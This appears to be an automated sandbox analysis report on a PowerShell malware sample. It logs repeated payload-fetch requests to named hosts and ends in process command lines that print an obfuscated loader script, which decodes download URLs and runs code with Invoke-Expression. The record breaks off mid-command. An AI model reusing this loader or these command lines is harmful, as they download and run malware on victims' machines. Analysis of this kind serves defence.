                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:38 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:38 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:38 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            14192.168.2.1049924148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:43 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:44 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:44 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:44 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:44 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            15192.168.2.1049935184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:49 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:50 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:40:49 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:40:50 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            16192.168.2.1049947148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:40:55 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:40:55 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:40:55 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:40:55 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:40:55 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            17192.168.2.1049963184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:01 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:01 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:01 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:01 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            18192.168.2.1049976148.251.114.2334438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:07 UTC98OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.erp-royal-crown.info
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:07 UTC238INHTTP/1.1 404 Not Found
                                                                            Connection: close
                                                                            cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                            pragma: no-cache
                                                                            content-type: text/html
                                                                            content-length: 1251
                                                                            date: Thu, 05 Dec 2024 09:41:07 GMT
                                                                            server: LiteSpeed
                                                                            2024-12-05 09:41:07 UTC1130INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
                                                                            Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
                                                                            2024-12-05 09:41:07 UTC121INData Raw: 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 69 74 65 2e 3c 2f 70 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                            Data Ascii: Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.1049990184.171.244.2314438156C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-05 09:41:12 UTC89OUTGET /wh/Subordinerendes78.smi HTTP/1.1
                                                                            Host: www.almrwad.com
                                                                            Connection: Keep-Alive
                                                                            2024-12-05 09:41:13 UTC164INHTTP/1.1 404 Not Found
                                                                            Date: Thu, 05 Dec 2024 09:41:13 GMT
                                                                            Server: Apache
                                                                            Content-Length: 315
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                            2024-12-05 09:41:13 UTC315INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65
                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:2
                                                                            Start time:04:39:06
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ap.ps1"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:3
                                                                            Start time:04:39:07
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff620390000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:5
                                                                            Start time:04:39:09
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\utwxgh.vbs'"
                                                                            Imagebase:0x7ff7b2bb0000
                                                                            File size:452'608 bytes
                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:8
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\wscript.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\sz3.vbs"
                                                                            Imagebase:0x7ff6cb770000
                                                                            File size:170'496 bytes
                                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:high
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:9
                                                                            Start time:04:39:28
                                                                            Start date:05/12/2024
                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar 